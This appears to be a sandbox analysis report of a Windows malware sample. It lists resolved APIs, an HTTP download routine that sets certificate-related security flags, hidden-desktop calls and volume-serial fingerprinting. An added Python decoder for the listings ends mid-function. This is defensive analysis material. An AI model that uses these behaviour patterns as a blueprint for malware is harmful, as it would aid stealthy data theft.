                          control_flow_graph 633 7266e0-7266e7 634 726afe-726b92 LoadLibraryA * 8 633->634 635 7266ed-726af9 GetProcAddress * 43 633->635 636 726b94-726c03 GetProcAddress * 5 634->636 637 726c08-726c0f 634->637 635->634 636->637 638 726cd2-726cd9 637->638 639 726c15-726ccd GetProcAddress * 8 637->639 640 726cdb-726d4a GetProcAddress * 5 638->640 641 726d4f-726d56 638->641 639->638 640->641 642 726de9-726df0 641->642 643 726d5c-726de4 GetProcAddress * 6 641->643 644 726f10-726f17 642->644 645 726df6-726f0b GetProcAddress * 12 642->645 643->642 646 726f19-726f88 GetProcAddress * 5 644->646 647 726f8d-726f94 644->647 645->644 646->647 648 726fc1-726fc8 647->648 649 726f96-726fbc GetProcAddress * 2 647->649 650 726ff5-726ffc 648->650 651 726fca-726ff0 GetProcAddress * 2 648->651 649->648 652 727002-7270e8 GetProcAddress * 10 650->652 653 7270ed-7270f4 650->653 651->650 652->653 654 727152-727159 653->654 655 7270f6-72714d GetProcAddress * 4 653->655 656 72715b-727169 GetProcAddress 654->656 657 72716e-727175 654->657 655->654 656->657 658 7271d3 657->658 659 727177-7271ce GetProcAddress * 4 657->659 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75900000,010C6460), ref: 007266F5
                          • GetProcAddress.KERNEL32(75900000,010C6500), ref: 0072670D
                          • GetProcAddress.KERNEL32(75900000,010D8F70), ref: 00726726
                          • GetProcAddress.KERNEL32(75900000,010D8F88), ref: 0072673E
                          • GetProcAddress.KERNEL32(75900000,010DD058), ref: 00726756
                          • GetProcAddress.KERNEL32(75900000,010DD070), ref: 0072676F
                          • GetProcAddress.KERNEL32(75900000,010CB130), ref: 00726787
                          • GetProcAddress.KERNEL32(75900000,010DCF20), ref: 0072679F
                          • GetProcAddress.KERNEL32(75900000,010DD088), ref: 007267B8
                          • GetProcAddress.KERNEL32(75900000,010DCF80), ref: 007267D0
                          • GetProcAddress.KERNEL32(75900000,010DCFB0), ref: 007267E8
                          • GetProcAddress.KERNEL32(75900000,010C6480), ref: 00726801
                          • GetProcAddress.KERNEL32(75900000,010C63E0), ref: 00726819
                          • GetProcAddress.KERNEL32(75900000,010C62E0), ref: 00726831
                          • GetProcAddress.KERNEL32(75900000,010C6620), ref: 0072684A
                          • GetProcAddress.KERNEL32(75900000,010DD0A0), ref: 00726862
                          • GetProcAddress.KERNEL32(75900000,010DD010), ref: 0072687A
                          • GetProcAddress.KERNEL32(75900000,010CAF28), ref: 00726893
                          • GetProcAddress.KERNEL32(75900000,010C6400), ref: 007268AB
                          • GetProcAddress.KERNEL32(75900000,010DCF38), ref: 007268C3
                          • GetProcAddress.KERNEL32(75900000,010DCF98), ref: 007268DC
                          • GetProcAddress.KERNEL32(75900000,010DD0B8), ref: 007268F4
                          • GetProcAddress.KERNEL32(75900000,010DCFC8), ref: 0072690C
                          • GetProcAddress.KERNEL32(75900000,010C6520), ref: 00726925
                          • GetProcAddress.KERNEL32(75900000,010DCFE0), ref: 0072693D
                          • GetProcAddress.KERNEL32(75900000,010DD040), ref: 00726955
                          • GetProcAddress.KERNEL32(75900000,010DD0D0), ref: 0072696E
                          • GetProcAddress.KERNEL32(75900000,010DCFF8), ref: 00726986
                          • GetProcAddress.KERNEL32(75900000,010DD028), ref: 0072699E
                          • GetProcAddress.KERNEL32(75900000,010DCF50), ref: 007269B7
                          • GetProcAddress.KERNEL32(75900000,010DCF68), ref: 007269CF
                          • GetProcAddress.KERNEL32(75900000,010DC968), ref: 007269E7
                          • GetProcAddress.KERNEL32(75900000,010DCB78), ref: 00726A00
                          • GetProcAddress.KERNEL32(75900000,010D9B38), ref: 00726A18
                          • GetProcAddress.KERNEL32(75900000,010DCB48), ref: 00726A30
                          • GetProcAddress.KERNEL32(75900000,010DCA10), ref: 00726A49
                          • GetProcAddress.KERNEL32(75900000,010C6540), ref: 00726A61
                          • GetProcAddress.KERNEL32(75900000,010DCB18), ref: 00726A79
                          • GetProcAddress.KERNEL32(75900000,010C6280), ref: 00726A92
                          • GetProcAddress.KERNEL32(75900000,010DCB60), ref: 00726AAA
                          • GetProcAddress.KERNEL32(75900000,010DCAE8), ref: 00726AC2
                          • GetProcAddress.KERNEL32(75900000,010C6560), ref: 00726ADB
                          • GetProcAddress.KERNEL32(75900000,010C6580), ref: 00726AF3
                          • LoadLibraryA.KERNEL32(010DCBC0,0072051F), ref: 00726B05
                          • LoadLibraryA.KERNEL32(010DCB90), ref: 00726B16
                          • LoadLibraryA.KERNEL32(010DC920), ref: 00726B28
                          • LoadLibraryA.KERNEL32(010DCB30), ref: 00726B3A
                          • LoadLibraryA.KERNEL32(010DCBA8), ref: 00726B4B
                          • LoadLibraryA.KERNEL32(010DC998), ref: 00726B5D
                          • LoadLibraryA.KERNEL32(010DCA70), ref: 00726B6F
                          • LoadLibraryA.KERNEL32(010DCBD8), ref: 00726B80
                          • GetProcAddress.KERNEL32(75FD0000,010C68A0), ref: 00726B9C
                          • GetProcAddress.KERNEL32(75FD0000,010DCBF0), ref: 00726BB4
                          • GetProcAddress.KERNEL32(75FD0000,010D8A60), ref: 00726BCD
                          • GetProcAddress.KERNEL32(75FD0000,010DCAB8), ref: 00726BE5
                          • GetProcAddress.KERNEL32(75FD0000,010C66C0), ref: 00726BFD
                          • GetProcAddress.KERNEL32(734B0000,010CB068), ref: 00726C1D
                          • GetProcAddress.KERNEL32(734B0000,010C6840), ref: 00726C35
                          • GetProcAddress.KERNEL32(734B0000,010CAFC8), ref: 00726C4E
                          • GetProcAddress.KERNEL32(734B0000,010DCC08), ref: 00726C66
                          • GetProcAddress.KERNEL32(734B0000,010DC938), ref: 00726C7E
                          • GetProcAddress.KERNEL32(734B0000,010C6740), ref: 00726C97
                          • GetProcAddress.KERNEL32(734B0000,010C69A0), ref: 00726CAF
                          • GetProcAddress.KERNEL32(734B0000,010DCAA0), ref: 00726CC7
                          • GetProcAddress.KERNEL32(763B0000,010C66E0), ref: 00726CE3
                          • GetProcAddress.KERNEL32(763B0000,010C6680), ref: 00726CFB
                          • GetProcAddress.KERNEL32(763B0000,010DC950), ref: 00726D14
                          • GetProcAddress.KERNEL32(763B0000,010DCA58), ref: 00726D2C
                          • GetProcAddress.KERNEL32(763B0000,010C6960), ref: 00726D44
                          • GetProcAddress.KERNEL32(750F0000,010CAFF0), ref: 00726D64
                          • GetProcAddress.KERNEL32(750F0000,010CB158), ref: 00726D7C
                          • GetProcAddress.KERNEL32(750F0000,010DC980), ref: 00726D95
                          • GetProcAddress.KERNEL32(750F0000,010C6980), ref: 00726DAD
                          • GetProcAddress.KERNEL32(750F0000,010C69C0), ref: 00726DC5
                          • GetProcAddress.KERNEL32(750F0000,010CB1D0), ref: 00726DDE
                          • GetProcAddress.KERNEL32(75A50000,010DC9B0), ref: 00726DFE
                          • GetProcAddress.KERNEL32(75A50000,010C6700), ref: 00726E16
                          • GetProcAddress.KERNEL32(75A50000,010D8BB0), ref: 00726E2F
                          • GetProcAddress.KERNEL32(75A50000,010DC9F8), ref: 00726E47
                          • GetProcAddress.KERNEL32(75A50000,010DC9C8), ref: 00726E5F
                          • GetProcAddress.KERNEL32(75A50000,010C66A0), ref: 00726E78
                          • GetProcAddress.KERNEL32(75A50000,010C6780), ref: 00726E90
                          • GetProcAddress.KERNEL32(75A50000,010DCA88), ref: 00726EA8
                          • GetProcAddress.KERNEL32(75A50000,010DC9E0), ref: 00726EC1
                          • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00726ED7
                          • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00726EEE
                          • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00726F05
                          • GetProcAddress.KERNEL32(75070000,010C6940), ref: 00726F21
                          • GetProcAddress.KERNEL32(75070000,010DCB00), ref: 00726F39
                          • GetProcAddress.KERNEL32(75070000,010DCAD0), ref: 00726F52
                          • GetProcAddress.KERNEL32(75070000,010DCA28), ref: 00726F6A
                          • GetProcAddress.KERNEL32(75070000,010DCA40), ref: 00726F82
                          • GetProcAddress.KERNEL32(74E50000,010C68C0), ref: 00726F9E
                          • GetProcAddress.KERNEL32(74E50000,010C69E0), ref: 00726FB6
                          • GetProcAddress.KERNEL32(75320000,010C6720), ref: 00726FD2
                          • GetProcAddress.KERNEL32(75320000,010DCE48), ref: 00726FEA
                          • GetProcAddress.KERNEL32(6F060000,010C6800), ref: 0072700A
                          • GetProcAddress.KERNEL32(6F060000,010C67E0), ref: 00727022
                          • GetProcAddress.KERNEL32(6F060000,010C6A00), ref: 0072703B
                          • GetProcAddress.KERNEL32(6F060000,010DCCE0), ref: 00727053
                          • GetProcAddress.KERNEL32(6F060000,010C6760), ref: 0072706B
                          • GetProcAddress.KERNEL32(6F060000,010C67A0), ref: 00727084
                          • GetProcAddress.KERNEL32(6F060000,010C6A20), ref: 0072709C
                          • GetProcAddress.KERNEL32(6F060000,010C67C0), ref: 007270B4
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 007270CB
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 007270E2
                          • GetProcAddress.KERNEL32(74E00000,010DCDE8), ref: 007270FE
                          • GetProcAddress.KERNEL32(74E00000,010D8AA0), ref: 00727116
                          • GetProcAddress.KERNEL32(74E00000,010DCE78), ref: 0072712F
                          • GetProcAddress.KERNEL32(74E00000,010DCE30), ref: 00727147
                          • GetProcAddress.KERNEL32(74DF0000,010C6820), ref: 00727163
                          • GetProcAddress.KERNEL32(6E540000,010DCE60), ref: 0072717F
                          • GetProcAddress.KERNEL32(6E540000,010C6860), ref: 00727197
                          • GetProcAddress.KERNEL32(6E540000,010DCD10), ref: 007271B0
                          • GetProcAddress.KERNEL32(6E540000,010DCCF8), ref: 007271C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 6af219ad7a28334988c5670e301abaf7486e482464611de5d6e92dbd5df7ce0f
                          • Instruction ID: db368da0efa68b6e5aa65cd75f0f84ef9d07c136a39de7b24909b7bb71016e82
                          • Opcode Fuzzy Hash: 6af219ad7a28334988c5670e301abaf7486e482464611de5d6e92dbd5df7ce0f
                          • Instruction Fuzzy Hash: 15622EB9A3C7009FD758DF65EE88A2737B9F7896053108919F95683364DBB4A800FF60
                          APIs
                          • lstrlen.KERNEL32(0072CFEC), ref: 0071F1D5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F1F1
                          • lstrlen.KERNEL32(0072CFEC), ref: 0071F1FC
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F215
                          • lstrlen.KERNEL32(0072CFEC), ref: 0071F220
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F239
                          • lstrcpy.KERNEL32(00000000,00734FA0), ref: 0071F25E
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F28C
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F2C0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071F2F0
                          • lstrlen.KERNEL32(010C6420), ref: 0071F315
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 141d0134341a25fdd82bc42abcd5378f865465168dea7b00a7c5dd6b106c408d
                          • Instruction ID: 171b6aa50bd633e05f3bd75b5fa96a8802b4674f310f80d719b8c3daedac18b0
                          • Opcode Fuzzy Hash: 141d0134341a25fdd82bc42abcd5378f865465168dea7b00a7c5dd6b106c408d
                          • Instruction Fuzzy Hash: 07A25171A15205CFCB20DF69D948A9AB7F5AF44314F188179E805EB2E2DB39DC82DF50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720013
                          • lstrlen.KERNEL32(0072CFEC), ref: 007200BD
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007200E1
                          • lstrlen.KERNEL32(0072CFEC), ref: 007200EC
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720110
                          • lstrlen.KERNEL32(0072CFEC), ref: 0072011B
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0072013F
                          • lstrlen.KERNEL32(0072CFEC), ref: 0072015A
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720189
                          • lstrlen.KERNEL32(0072CFEC), ref: 00720194
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007201C3
                          • lstrlen.KERNEL32(0072CFEC), ref: 007201CE
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720206
                          • lstrlen.KERNEL32(0072CFEC), ref: 00720250
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00720288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0072059B
                          • lstrlen.KERNEL32(010C6360), ref: 007205AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007205D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007205E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072060E
                          • lstrlen.KERNEL32(010DDF00), ref: 00720625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0072064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00720658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00720681
                          • lstrlen.KERNEL32(010C6340), ref: 00720698
                          • lstrcpy.KERNEL32(00000000,?), ref: 007206C9
                          • lstrcat.KERNEL32(00000000,?), ref: 007206D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00720706
                          • lstrcpy.KERNEL32(00000000,010D8AF0), ref: 0072074B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0072077F
                          • lstrcpy.KERNEL32(00000000,010DDC48), ref: 007207E7
                          • lstrcpy.KERNEL32(00000000,010D88C0), ref: 00720858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 007208CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00720928
                          • lstrcpy.KERNEL32(00000000,010D89A0), ref: 007209F8
                            • Part of subcall function 007024E0: lstrcpy.KERNEL32(00000000,?), ref: 00702528
                            • Part of subcall function 007024E0: lstrcpy.KERNEL32(00000000,?), ref: 0070254E
                            • Part of subcall function 007024E0: lstrcpy.KERNEL32(00000000,?), ref: 00702577
                          • lstrcpy.KERNEL32(00000000,010D8940), ref: 00720ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00720B81
                          • lstrcpy.KERNEL32(00000000,010D8940), ref: 00720D58
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: a2475b3ce4742d7c3c797e3280b5825e2564041eed3cb4aeadb01c54a4e63ef3
                          • Instruction ID: 9fbaba91226f05670f1fcebdc6f6f00d31d9aa446b4e56865b214deb97c44cb7
                          • Opcode Fuzzy Hash: a2475b3ce4742d7c3c797e3280b5825e2564041eed3cb4aeadb01c54a4e63ef3
                          • Instruction Fuzzy Hash: 99E25971A05351CFC734DF29D488B5ABBE1BF88304F58856DE48D8B292DB399846CF92

                          Control-flow Graph (function 00706C40; rendered graph omitted, legend: Executed / Not Executed). Basic blocks and the API calls they contain:
                          • 706c40-706c64: call 702930
                          • 706c6d-706c6f: lstrcpy
                          • 706c75-706c97: call 704bc0
                          • 706cbc-706cc2: lstrcpy
                          • 706cc8-706cf5: InternetOpenA, StrCmpCA
                          • 706d02-706d22: InternetConnectA
                          • 706d28-706d5d: HttpOpenRequestA
                          • 706d67-706d77: InternetSetOptionA
                          • 706d7d-706dad: HttpSendRequestA, HttpQueryInfoA
                          • 706daf-706dd3: call 7271e0, call 702a20 (x2)
                          • 706dd4-706de4: call 723d90
                          • 706dee-706e07: InternetReadFile
                          • 706e17-706e3d: call 727310
                          • 706e3f: call 702a20
                          • 706e44-706e51: call 702930
                          • 706e59-706e5b: lstrcpy
                          • 706e61-706e8b: call 702a20, InternetReadFile (back edge to 706e10-706e15: the read loop)
                          • 706e8d-706e8e, 706e94-706e9e, 706ea1-706ea2: InternetCloseHandle (request, connection and session handles)
                          • 706ea8-706ebb: call 702930
                          • 706ec1-706ec3: lstrcpy
                          • 706ec9-706ee0: call 702a20 (x2)
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00706C6F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706CC2
                          • InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 00706CD5
                          • StrCmpCA.SHLWAPI(?,010DE538), ref: 00706CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,010DDEB8,00000000,00000000,-00400100,00000000), ref: 00706D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00706D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00706DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00706DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00706E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00706E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00706E8E
                          • InternetCloseHandle.WININET(?), ref: 00706E98
                          • InternetCloseHandle.WININET(00000000), ref: 00706EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00706EC3
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: b089a8f63b945662055bca0e6924ba99f9c80be778d041cc169ab1f1dfb583ea
                          • Instruction ID: 4488fbf9b532f3832c05124406af7b9678b01100bbf37552ed57a723d4257b06
                          • Opcode Fuzzy Hash: b089a8f63b945662055bca0e6924ba99f9c80be778d041cc169ab1f1dfb583ea
                          • Instruction Fuzzy Hash: 90816F76A54315EBEB20DFA4DC49BAE77F8AF44700F144268F905E7281DB78AD058B90
                          APIs
                          • lstrlen.KERNEL32(010C6420), ref: 0071F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F47B
                          • lstrcpy.KERNEL32(00000000,010C6420), ref: 0071F4BB
                          • lstrcpy.KERNEL32(00000000,010D8B60), ref: 0071F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0071F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0071F718
                          • lstrlen.KERNEL32(010D8AE0), ref: 0071F746
                          • lstrcpy.KERNEL32(00000000,010D8AE0), ref: 0071F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0071FA32
                          • lstrlen.KERNEL32(010D8AC0), ref: 0071FA60
                          • lstrcpy.KERNEL32(00000000,010D8AC0), ref: 0071FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071FAFE
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: ee3f70142b42a16836294ee59987d185dcb50fbde09a1c1f8c03baea8a29756b
                          • Instruction ID: bce78b76629e2171cb644fbe9198f5742710de21f0328995154c2069164a7c34
                          • Opcode Fuzzy Hash: ee3f70142b42a16836294ee59987d185dcb50fbde09a1c1f8c03baea8a29756b
                          • Instruction Fuzzy Hash: 34F13D74A15202CFDB24DF69D898AA5B7F5BF44314B18C1B9D809AB2E1D739DC82DF40

                          Control-flow Graph (function 00718CA0; rendered graph omitted, legend: Executed / Not Executed). Basic blocks and the API calls they contain:
                          • 718ca0-718cc4: StrCmpCA (one branch goes to 718cc6-718cc7, the other continues at 718ccd)
                          • 718cc6-718cc7: ExitProcess
                          • 718ccd-718ce6, 718cec-718cf1, 718cf6-718cf9: loop head; 718cff dispatches to one of the cases below, 718ec3-718edc returns to 718cf6 via 718cf3 or leaves through 718ee2
                          • 718d06-718d15, 718d30-718d3f, 718d5a-718d69, 718e88-718e9a: lstrlen, then call 702a20 and call 702930
                          • 718d84-718d92, 718da4-718db8, 718dbd-718dcb, 718ddd-718deb, 718dfd-718e0b, 718e1d-718e2b, 718e3d-718e4b, 718e56-718e64, 718e6f-718e7d: StrCmpCA
                          • 718eb3-718eb5, 718eb7-718eb9, 718ebb-718ebd: lstrcpy (reached from the lstrlen cases)
                          • 718ee2-718eef: call 702a20 (function exit)
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 97975a0cb0b32992b57924c69f498dceed1301d8ac470fc161d366671be41c8d
                          • Instruction ID: 2026dc7067d14159d7b9c856b4b022548a74cd78f7fb90818d9da2281d8293c3
                          • Opcode Fuzzy Hash: 97975a0cb0b32992b57924c69f498dceed1301d8ac470fc161d366671be41c8d
                          • Instruction Fuzzy Hash: 38519371A28701DFD7609F79DC88AAB77F4BB04700B10481DF442D6691DBBCE9859F62

                          Control-flow Graph (function 00722740; rendered graph omitted, legend: Executed / Not Executed). Basic blocks and the API calls they contain:
                          • 722740-722783: GetWindowsDirectoryA (722785 is the fall-through block)
                          • 72278c-7227ea: GetVolumeInformationA
                          • 7227ec-7227f2 and 7227f4-722807: loop
                          • 722809-722820: GetProcessHeap, RtlAllocateHeap (one branch bypasses the format call via 722822-722824)
                          • 722826-722844: wsprintfA
                          • 72285b-722872: call 7271e0
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0072277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,007193B6,00000000,00000000,00000000,00000000), ref: 007227AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0072280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722816
                          • wsprintfA.USER32 ref: 0072283B
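The two API listings above, the WinINet routine at 00706C40 and the GetVolumeInformationA/wsprintfA routine at 00722740, are machine-generated and leave the numeric arguments undecoded. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses listing lines of this shape, decodes the WinINet constants that the report prints raw (dwAccessType 1 = INTERNET_OPEN_TYPE_DIRECT, dwService 3 = INTERNET_SERVICE_HTTP, option 0x1F = INTERNET_OPTION_SECURITY_FLAGS, query 0x13 = HTTP_QUERY_STATUS_CODE, read chunk 0x7CF bytes) and flags the two call chains. The sample records are copied from this page; the constant names are from wininet.h; treating the InternetSetOptionA buffer argument rendered as 00010300 as the DWORD value rather than a buffer address is an assumption, since the report does not say which it printed.

```python
# Added example: parse Joe Sandbox "APIs" listing lines and flag two call chains.
# Not part of the report or the analysed sample. SAMPLE_RECORDS is constructed from
# this page's own listings; constants are from wininet.h; reading the InternetSetOptionA
# buffer argument (00010300) as the DWORD value rather than a pointer is an assumption.
import re
from collections import namedtuple

SAMPLE_RECORDS = {  # constructed from the function records on this page
    "00706C40": """
• InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 00706CD5
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706D15
• HttpOpenRequestA.WININET(00000000,GET,?,010DDEB8,00000000,00000000,-00400100,00000000), ref: 00706D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00706D77
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706D86
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00706DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00706DFF
• InternetCloseHandle.WININET(00000000), ref: 00706E8E
""",
    "00722740": """
• GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0072277B
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,007193B6,00000000,00000000,00000000,00000000), ref: 007227AC
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 0072280F
• RtlAllocateHeap.NTDLL(00000000), ref: 00722816
• wsprintfA.USER32 ref: 0072283B
""",
}

# One listing line: optional "Part of subcall function X:" prefix, Api.MODULE(args), ref: addr.
# wsprintfA is listed without an argument list, so the parenthesised group is optional.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX_RE = re.compile(r"-?[0-9A-Fa-f]{8}")  # Joe prints 32-bit values as 8 hex digits, signed

# wininet.h constants used by the decoders
INTERNET_OPEN_TYPE = {0: "PRECONFIG", 1: "DIRECT", 3: "PROXY"}
INTERNET_SERVICE = {1: "FTP", 2: "GOPHER", 3: "HTTP"}
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAGS = {0x80: "IGNORE_REVOCATION", 0x100: "IGNORE_UNKNOWN_CA",
                  0x200: "IGNORE_WRONG_USAGE", 0x1000: "IGNORE_CERT_CN_INVALID",
                  0x2000: "IGNORE_CERT_DATE_INVALID", 0x10000: "IGNORE_WEAK_SIGNATURE"}
HTTP_QUERY = {0x13: "STATUS_CODE"}

Call = namedtuple("Call", "api module args ref")  # args: int for hex, None for '?', str otherwise

def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if HEX_RE.fullmatch(tok) else tok

def parse_apis(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls

def find_chain(calls, chain):
    """Indexes of the first in-order (not necessarily adjacent) match of `chain`, or None."""
    found, pos = [], 0
    for api in chain:
        while pos < len(calls) and calls[pos].api != api:
            pos += 1
        if pos == len(calls):
            return None
        found.append(pos)
        pos += 1
    return found

def decode_download(calls):
    """WinINet GET chain: open -> connect -> request -> send -> read, plus TLS/status options."""
    idx = find_chain(calls, ("InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                             "HttpSendRequestA", "InternetReadFile"))
    if idx is None:
        return None
    c = {calls[i].api: calls[i] for i in idx}
    info = {"access_type": INTERNET_OPEN_TYPE.get(c["InternetOpenA"].args[1]),
            "service": INTERNET_SERVICE.get(c["InternetConnectA"].args[5]),
            "verb": c["HttpOpenRequestA"].args[1],
            "read_chunk": c["InternetReadFile"].args[2],
            "security_flags": [], "queries": []}
    for call in calls:
        if call.api == "InternetSetOptionA" and call.args[1] == INTERNET_OPTION_SECURITY_FLAGS:
            value = call.args[2]  # assumption: the listing shows the DWORD, not the buffer address
            info["security_flags"] = [n for bit, n in SECURITY_FLAGS.items() if value & bit]
        elif call.api == "HttpQueryInfoA":
            info["queries"].append(HTTP_QUERY.get(call.args[1], call.args[1]))
    return info

def decode_fingerprint(calls):
    """Volume serial read with GetVolumeInformationA and formatted with wsprintfA."""
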